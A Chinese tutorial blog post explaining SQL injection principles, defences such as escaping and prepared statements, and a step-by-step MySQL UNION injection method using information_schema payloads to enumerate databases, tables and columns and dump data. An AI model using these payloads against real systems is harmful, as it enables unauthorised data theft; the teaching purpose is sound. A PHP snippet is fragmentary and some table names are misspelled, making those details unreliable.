sql注入基础&mysql联合查询方法
讲在前面:
网上有很多关于对sql注入的讲解,但是最后还是觉得自己总结一下更好一些,也希望自己写的把这一块讲的比较清楚,来帮助可能对sql注入的原理,产生原因,以及payload有写模糊的人。也欢迎大佬们及时斧正,一起交流
学习sql注入首先要对SQL语法有一个基本的了解,只少要对掌握sql的查询语句。本篇文章不涉及数据库基础的更多知识。只和大家说一下
select 为查询语句的关键字
from 后面跟查询的路径(查询路径指的是数据库 表 之类)
where 后面跟查询条件
一、sql注入攻击整体思路
1.寻找到SQL注入的位置
2.判断服务器类型和后台数据库类型
3.针对不通的服务器和数据库特点进行SQL注入攻击
二、sql注入原理
把sql语句插入网页url(GET)表单提交(POST) 还有cookie,从而欺骗服务器获取数据库敏感信息
三、防护:
1 、对用户的输入进行校验,接收到提交的参数对特殊字符进行转移,mysql_real_escape_string()函数可以将 \x00 \n \r \ ’ "等字符进行转义
' . mysql_error() . '';
echo 'ID: ' . $id . '
First name: ' . $first . '
Surname: ' . $last;
echo '';
$i++;
}
}
?>
2不要使用动态拼接
3用户的异常信息减少提示
4.采用sql语句预编译和绑定变量(使用PreparedStatement)
String sql = "select id, no from user where id=?";
PreparedStatement ps = conn.prepareStatement(sql);
ps.setInt(1, id);
ps.executeQuery();
采用了PreparedStatement,就会将sql语句:“select id, no from user where id=?” 预先编译好,后面你输入的参数,无论你输入的是什么,都不会影响该sql语句的 语法结构了,因为语法分析已经完成了,那么后面输入的参数,不会作为sql命令来执行的,只会被当做字符串字面值参数。
四、mysql数据库联合查询注入
先说清楚几个问题:我们假设order by 查到的字段有5列,下面的1,2,3,4,5是占位符
(1)在参数数值后面加‘ 发现页面报错
(2) 在参数数值后面加 and 1=1 (页面回显正常) and 1=2 (页面又报错)
证明sql注入payload可以写入数据库并可以被服务器执行
(3)在参数数值后面加 order by 加数字 判断字段数目(从高向低试)第一个回显正常页面的数字正确
(4)查数据库
union select 1,2,3,4,5 from information_schema.schemate
(在information_schema数据库中schemate表下存放着所有数据库的名字
databaes()用来查询数据库名字)
(5)查表名
union select 1,table_name,3,4,5 from information_schema.tables where TABLE_SCHEMA= ‘数据库名’ limit 0,1
(information_schema数据库tables表下table_name列存放着表名而table_schema列则是对应的是对应的数据库)
(6)查列名
and 1=2 union select 1,COLUMN_NAME,3,4,5 from information_schema.COLUMNS where
TABLE_NAME=’表名’ limit 0,1
(同理columns:(表)存放着列名 Column_name:(列)存着列名字)
(7)查字段
union select 1,列名1,列名2,4,5 from 数据库.表名 limit 0,1
union select 1,group_concat(列名1),group_concat(列名2),4,5 from 数据库.表名 limit 0,1
(from 后面的 数据库.表名就是上面 (4)(5)步查出来的数据库和表名 切记中间有一个引英文的 ‘.’ )